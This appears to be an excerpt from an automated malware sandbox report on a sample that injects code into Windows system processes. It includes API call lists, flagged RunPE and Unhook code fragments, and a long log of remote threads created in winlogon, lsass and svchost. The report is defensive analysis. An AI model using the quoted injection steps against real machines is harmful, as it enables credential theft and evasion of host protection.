Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_000001CA7D218814
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,43_2_0000017D2DD58814
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B928814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_0000022F4B928814
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B92CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_0000022F4B92CD80
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B9284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_0000022F4B9284B0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B958814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_0000022F4B958814
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B95CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_0000022F4B95CD80
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B9584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_0000022F4B9584B0
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CD8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,45_2_00000262F1CD8814
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CDCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00000262F1CDCD80
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CD84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00000262F1CD84B0
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,45_2_00000262F1D08814
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00000262F1D0CD80
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00000262F1D084B0
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_0000023942B1CD80
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,46_2_0000023942B18814
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,46_2_0000023942B184B0
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001EF056DCD80
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,47_2_000001EF056D8814
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001EF056D84B0
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF0570CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001EF0570CD80
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF05708814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,47_2_000001EF05708814
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF057084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001EF057084B0

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 39.2.powershell.exe.1909cf124f8.12.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 39.2.powershell.exe.1908cbc0000.0.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,41_2_0000000140002434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: D10000
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B922EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: F1CA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F1632EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6A1A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9B2D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 841B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E122EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59C82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E122EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59C82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E6E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B2812EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E6E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B2812EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C9A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6EDC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
